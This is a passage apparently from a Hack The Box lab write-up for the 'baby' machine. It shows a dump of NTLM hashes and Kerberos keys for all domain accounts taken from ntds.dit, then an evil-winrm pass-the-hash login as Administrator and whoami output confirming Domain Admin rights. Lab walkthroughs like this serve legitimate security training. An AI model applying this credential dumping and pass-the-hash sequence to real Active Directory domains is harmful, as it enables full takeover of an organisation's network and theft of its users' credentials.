[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34aed8:::
baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89:::
baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1:::
baby.vl\Leonard.Dyer:1107:aad3b435b51404eeaad3b435b51404ee:b3b2f9c6640566d13bf25ac448f560d2:::
baby.vl\Ian.Walker:1108:aad3b435b51404eeaad3b435b51404ee:0e440fd30bebc2c524eaaed6b17bcd5c:::
baby.vl\Connor.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:e125345993f6258861fb184f1a8522c9:::
baby.vl\Joseph.Hughes:1112:aad3b435b51404eeaad3b435b51404ee:31f12d52063773769e2ea5723e78f17f:::
baby.vl\Kerry.Wilson:1113:aad3b435b51404eeaad3b435b51404ee:181154d0dbea8cc061731803e601d1e4:::
baby.vl\Teresa.Bell:1114:aad3b435b51404eeaad3b435b51404ee:7735283d187b758f45c0565e22dc20d8:::
baby.vl\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:5fa67a134024d41bb4ff8bfd7da5e2b5:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:ad08cbabedff5acb70049bef721524a23375708cadefcb788704ba00926944f4
Administrator:aes128-cts-hmac-sha1-96:ac7aa518b36d5ea26de83c8d6aa6714d
Administrator:des-cbc-md5:d38cb994ae806b97
BABYDC$:aes256-cts-hmac-sha1-96:1a7d22edfaf3a8083f96a0270da971b4a42822181db117cf98c68c8f76bcf192
BABYDC$:aes128-cts-hmac-sha1-96:406b057cd3a92a9cc719f23b0821a45b
BABYDC$:des-cbc-md5:8fef68979223d645
krbtgt:aes256-cts-hmac-sha1-96:9c578fe1635da9e96eb60ad29e4e4ad90fdd471ea4dff40c0c4fce290a313d97
krbtgt:aes128-cts-hmac-sha1-96:1541c9f79887b4305064ddae9ba09e14
krbtgt:des-cbc-md5:d57383f1b3130de5
baby.vl\Jacqueline.Barnett:aes256-cts-hmac-sha1-96:851185add791f50bcdc027e0a0385eadaa68ac1ca127180a7183432f8260e084
baby.vl\Jacqueline.Barnett:aes128-cts-hmac-sha1-96:3abb8a49cf283f5b443acb239fd6f032
baby.vl\Jacqueline.Barnett:des-cbc-md5:01df1349548a206b
baby.vl\Ashley.Webb:aes256-cts-hmac-sha1-96:fc119502b9384a8aa6aff3ad659aa63bab9ebb37b87564303035357d10fa1039
baby.vl\Ashley.Webb:aes128-cts-hmac-sha1-96:81f5f99fd72fadd005a218b96bf17528
baby.vl\Ashley.Webb:des-cbc-md5:9267976186c1320e
baby.vl\Hugh.George:aes256-cts-hmac-sha1-96:0ea359386edf3512d71d3a3a2797a75db3168d8002a6929fd242eb7503f54258
baby.vl\Hugh.George:aes128-cts-hmac-sha1-96:50b966bdf7c919bfe8e85324424833dc
baby.vl\Hugh.George:des-cbc-md5:296bec86fd323b3e
baby.vl\Leonard.Dyer:aes256-cts-hmac-sha1-96:6d8fd945f9514fe7a8bbb11da8129a6e031fb504aa82ba1e053b6f51b70fdddd
baby.vl\Leonard.Dyer:aes128-cts-hmac-sha1-96:35fd9954c003efb73ded2fde9fc00d5a
baby.vl\Leonard.Dyer:des-cbc-md5:022313dce9a252c7
baby.vl\Ian.Walker:aes256-cts-hmac-sha1-96:54affe14ed4e79d9c2ba61713ef437c458f1f517794663543097ff1c2ae8a784
baby.vl\Ian.Walker:aes128-cts-hmac-sha1-96:78dbf35d77f29de5b7505ee88aef23df
baby.vl\Ian.Walker:des-cbc-md5:bcb094c2012f914c
baby.vl\Connor.Wilkinson:aes256-cts-hmac-sha1-96:55b0af76098dfe3731550e04baf1f7cb5b6da00de24c3f0908f4b2a2ea44475e
baby.vl\Connor.Wilkinson:aes128-cts-hmac-sha1-96:9d4af8203b2f9e3ecf64c1cbbcf8616b
baby.vl\Connor.Wilkinson:des-cbc-md5:fda762e362ab7ad3
baby.vl\Joseph.Hughes:aes256-cts-hmac-sha1-96:2e5f25b14f3439bfc901d37f6c9e4dba4b5aca8b7d944957651655477d440d41
baby.vl\Joseph.Hughes:aes128-cts-hmac-sha1-96:39fa92e8012f1b3f7be63c7ca9fd6723
baby.vl\Joseph.Hughes:des-cbc-md5:02f1cd9e52e0f245
baby.vl\Kerry.Wilson:aes256-cts-hmac-sha1-96:db5f7da80e369ee269cd5b0dbaea74bf7f7c4dfb3673039e9e119bd5518ea0fb
baby.vl\Kerry.Wilson:aes128-cts-hmac-sha1-96:aebbe6f21c76460feeebea188affbe01
baby.vl\Kerry.Wilson:des-cbc-md5:1f191c8c49ce07fe
baby.vl\Teresa.Bell:aes256-cts-hmac-sha1-96:8bb9cf1637d547b31993d9b0391aa9f771633c8f2ed8dd7a71f2ee5b5c58fc84
baby.vl\Teresa.Bell:aes128-cts-hmac-sha1-96:99bf021e937e1291cc0b6e4d01d96c66
baby.vl\Teresa.Bell:des-cbc-md5:4cbcdc3de6b50ee9
baby.vl\Caroline.Robinson:aes256-cts-hmac-sha1-96:6fe5d46e01d6cf9909f479fb4d7afac0bd973981dd958e730a734aa82c9e13af
baby.vl\Caroline.Robinson:aes128-cts-hmac-sha1-96:f34e6c0c8686a46eea8fd15a361601f9
baby.vl\Caroline.Robinson:des-cbc-md5:fd40190d579138df
[*] Cleaning up...
成功登陆
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ evil-winrm -i 10.129.64.108 -u 'administrator' -H 'ee4457ae59f1e3fbd764e33d9cef123d'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
baby\administrator S-1-5-21-1407081343-4001094062-1444647654-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\Group Policy Creator Owners Group S-1-5-21-1407081343-4001094062-1444647654-520 Mandatory group, Enabled by default, Enabled group
BABY\Domain Admins Group S-1-5-21-1407081343-4001094062-1444647654-512 Mandatory group, Enabled by default, Enabled group
BABY\Schema Admins Group S-1-5-21-1407081343-4001094062-1444647654-518 Mandatory group, Enabled by default, Enabled group
BABY\Enterprise Admins Group S-1-5-21-1407081343-4001094062-1444647654-519 Mandatory group, Enabled by default, Enabled group
BABY\Denied RODC Password Replication Group Alias S-1-5-21-1407081343-4001094062-1444647654-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.